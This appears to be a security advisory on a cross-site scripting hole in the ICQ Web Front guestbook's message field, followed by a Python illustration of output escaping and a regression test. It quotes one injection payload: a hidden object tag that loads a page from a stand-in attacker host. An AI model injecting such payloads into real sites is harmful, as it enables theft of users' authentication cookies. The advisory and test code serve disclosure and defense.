It has been reported that ICQ Webfront is prone to a cross-site scripting vulnerability in the message field of the guestbook module. This issue is caused by improper sanitization of user-supplied data.
Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials from a user. Other attacks are possible as well.
<object style="display:none" data="http://www.example.com/bad.asp"></object>
Mirabilis ICQ Web Front contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the message variable upon submission to the guestbook. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
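The missing step described above is output-encoding the guestbook message before it is written into the page. The following is an added illustration of that step together with a regression check; it is not ICQ Web Front code or a vendor fix, and the template and function names are assumptions made for the example.

```python
# Added illustration: hypothetical guestbook renderer, not ICQ Web Front code.
from html import escape
from html.parser import HTMLParser

# Assumed entry template; the real product's markup is not shown in the advisory.
ENTRY_TEMPLATE = '<div class="entry"><b>{name}</b><p>{message}</p></div>'

# The sample message quoted in the advisory above.
SAMPLE_MESSAGE = ('<object style="display:none" '
                  'data="http://www.example.com/bad.asp"></object>')


def render_entry_unsafe(name, message):
    """Flawed pattern: the submitted message is written into the page as-is."""
    return ENTRY_TEMPLATE.format(name=name, message=message)


def render_entry_safe(name, message):
    """Encode &, <, >, " and ' so the browser treats both fields as text."""
    return ENTRY_TEMPLATE.format(name=escape(name, quote=True),
                                 message=escape(message, quote=True))


class TagCollector(HTMLParser):
    """Records every element start tag found in a piece of markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_elements(rendered):
    """Elements in a rendered entry beyond those the template itself emits."""
    found = elements_in(rendered)
    for tag in elements_in(ENTRY_TEMPLATE):
        if tag in found:
            found.remove(tag)
    return found


if __name__ == "__main__":
    print(injected_elements(render_entry_unsafe("guest", SAMPLE_MESSAGE)))
    print(injected_elements(render_entry_safe("guest", SAMPLE_MESSAGE)))
```

Running `injected_elements` over stored guestbook entries in a test suite catches any rendering path that skips the encoding step.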